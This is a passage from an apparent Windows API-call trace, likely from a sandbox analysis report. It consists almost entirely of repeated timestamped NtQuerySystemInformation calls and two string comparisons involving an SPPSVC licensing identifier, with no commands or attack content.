Length=0x0, ResultLength=0x0) [0295.019] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.019] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.019] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.019] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217eee0, Length=0x40, ResultLength=0x0) [0295.019] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.019] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217eee0, Length=0x40, ResultLength=0x0) [0295.019] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ee00, Length=0x30, ResultLength=0x0) [0295.020] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.020] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ee00, Length=0x30, ResultLength=0x0) [0295.020] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ed08, Length=0x30, ResultLength=0x0) [0295.020] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ec70, Length=0x38, ResultLength=0x0) [0295.020] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.020] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.020] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.020] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217eae0, Length=0x50, ResultLength=0x0) [0295.020] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ea60, Length=0x28, ResultLength=0x0) [0295.020] _wcsicmp (_String1="SPPSVC\\0ff1ce15-a989-479d-af46-f275c6370663", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0295.021] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.021] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.021] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217eae0, Length=0x50, ResultLength=0x0) [0295.021] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.021] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217eae0, Length=0x50, ResultLength=0x0) [0295.021] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.021] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217eae0, Length=0x50, ResultLength=0x0) [0295.021] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.022] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ea10, Length=0x38, ResultLength=0x0) [0295.063] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.063] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e840, Length=0x28, ResultLength=0x0) [0295.063] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.063] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.063] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e840, Length=0x28, ResultLength=0x0) [0295.063] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.063] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.063] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e840, Length=0x28, ResultLength=0x0) [0295.064] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.064] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.064] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e8b0, Length=0x28, ResultLength=0x0) [0295.064] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.064] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.064] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ea10, Length=0x38, ResultLength=0x0) [0295.064] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.065] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e930, Length=0x28, ResultLength=0x0) [0295.068] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.068] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.068] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.068] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.068] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.069] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e930, Length=0x28, ResultLength=0x0) [0295.069] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e7d0, Length=0x20, ResultLength=0x0) [0295.069] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e750, Length=0x20, ResultLength=0x0) [0295.069] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.069] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e750, Length=0x20, ResultLength=0x0) [0295.069] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.069] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e750, Length=0x20, ResultLength=0x0) [0295.069] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.069] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.069] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.069] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.069] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.070] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ea10, Length=0x38, ResultLength=0x0) [0295.070] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.070] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ea10, Length=0x38, ResultLength=0x0) [0295.070] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e890, Length=0x20, ResultLength=0x0) [0295.070] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e820, Length=0x20, ResultLength=0x0) [0295.070] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.070] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.070] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.070] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e820, Length=0x20, ResultLength=0x0) [0295.071] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.071] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.071] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.071] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.071] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.071] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.072] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.072] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217eee0, Length=0x40, ResultLength=0x0) [0295.075] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.075] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217eee0, Length=0x40, ResultLength=0x0) [0295.075] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.075] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217eee0, Length=0x40, ResultLength=0x0) [0295.075] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ee00, Length=0x30, ResultLength=0x0) [0295.075] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.075] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ee00, Length=0x30, ResultLength=0x0) [0295.076] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ed08, Length=0x30, ResultLength=0x0) [0295.076] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ec70, Length=0x38, ResultLength=0x0) [0295.076] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.076] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.076] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.076] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217eae0, Length=0x50, ResultLength=0x0) [0295.076] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ea60, Length=0x28, ResultLength=0x0) [0295.076] _wcsicmp (_String1="SPPSVC\\0ff1ce15-a989-479d-af46-f275c6370663", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0295.076] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.076] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.076] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217eae0, Length=0x50, ResultLength=0x0) [0295.076] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.077] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217eae0, Length=0x50, ResultLength=0x0) [0295.077] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.077] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217eae0, Length=0x50, ResultLength=0x0) [0295.077] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.077] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ea10, Length=0x38, ResultLength=0x0) [0295.080] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.080] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e840, Length=0x28, ResultLength=0x0) [0295.080] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.080] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.080] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e840, Length=0x28, ResultLength=0x0) [0295.080] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.080] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.080] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e840, Length=0x28, ResultLength=0x0) [0295.080] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.080] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.080] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e8b0, Length=0x28, ResultLength=0x0) [0295.081] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.081] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.081] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ea10, Length=0x38, ResultLength=0x0) [0295.081] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.081] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e930, Length=0x28, ResultLength=0x0) [0295.084] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.085] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.085] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.085] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.085] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.085] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e930, Length=0x28, ResultLength=0x0) [0295.085] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e7d0, Length=0x20, ResultLength=0x0) [0295.085] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e750, Length=0x20, ResultLength=0x0) [0295.085] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.085] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e750, Length=0x20, ResultLength=0x0) [0295.086] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.086] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e750, Length=0x20, ResultLength=0x0) [0295.086] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.086] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.086] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.086] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.086] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.086] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ea10, Length=0x38, ResultLength=0x0) [0295.086] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.086] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ea10, Length=0x38, ResultLength=0x0) [0295.086] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e890, Length=0x20, ResultLength=0x0) [0295.086] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e820, Length=0x20, ResultLength=0x0) [0295.087] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.087] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.087] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.087] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e820, Length=0x20, ResultLength=0x0) [0295.087] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.087] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.087] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.087] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.087] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.087] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.088] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.088] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.090] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.091] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f030, Length=0x50, ResultLength=0x0) [0295.091] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.091] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f030, Length=0x50, ResultLength=0x0) [0295.091] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.091] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f030, Length=0x50, ResultLength=0x0) [0295.091] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ef20, Length=0x50, ResultLength=0x0) [0295.091] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.091] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ef20, Length=0x50, ResultLength=0x0) [0295.091] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.091] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ef20, Length=0x50, ResultLength=0x0) [0295.092] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.092] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ef20, Length=0x50, ResultLength=0x0) [0295.092] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.092] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ee50, Length=0x38, ResultLength=0x0) [0295.096] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.096] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ec80, Length=0x28, ResultLength=0x0) [0295.096] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.097] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.097] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ec80, Length=0x28, ResultLength=0x0) [0295.097] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.097] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.097] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ec80, Length=0x28, ResultLength=0x0) [0295.097] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.097] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.097] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ecf0, Length=0x28, ResultLength=0x0) [0295.097] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.097] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.097] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ee50, Length=0x38, ResultLength=0x0) [0295.098] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.098] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ed70, Length=0x28, ResultLength=0x0) [0295.101] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.101] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.101] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.101] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.101] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.101] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.102] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ed70, Length=0x28, ResultLength=0x0) [0295.102] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.138] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.138] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ee50, Length=0x38, ResultLength=0x0) [0295.138] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ecd0, Length=0x20, ResultLength=0x0) [0295.139] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ec50, Length=0x20, ResultLength=0x0) [0295.139] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.139] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ec50, Length=0x20, ResultLength=0x0) [0295.139] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.139] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ec50, Length=0x20, ResultLength=0x0) [0295.139] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.140] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.140] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.140] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.140] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ee50, Length=0x38, ResultLength=0x0) [0295.140] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ecd0, Length=0x20, ResultLength=0x0) [0295.140] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ec60, Length=0x20, ResultLength=0x0) [0295.141] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.141] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.141] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.141] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ec60, Length=0x20, ResultLength=0x0) [0295.141] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.141] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.142] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.142] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.142] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.143] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.143] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.143] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f030, Length=0x50, ResultLength=0x0) [0295.144] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.144] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f030, Length=0x50, ResultLength=0x0) [0295.144] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.144] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f030, Length=0x50, ResultLength=0x0) [0295.144] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ef20, Length=0x50, ResultLength=0x0) [0295.144] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.145] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ef20, Length=0x50, ResultLength=0x0) [0295.145] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.145] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ef20, Length=0x50, ResultLength=0x0) [0295.145] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.145] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ef20, Length=0x50, ResultLength=0x0) [0295.146] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.146] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ee50, Length=0x38, ResultLength=0x0) [0295.154] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.154] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ec80, Length=0x28, ResultLength=0x0) [0295.154] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.154] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.154] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ec80, Length=0x28, ResultLength=0x0) [0295.154] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.155] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.156] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ec80, Length=0x28, ResultLength=0x0) [0295.156] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.156] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.156] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ecf0, Length=0x28, ResultLength=0x0) [0295.156] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.156] 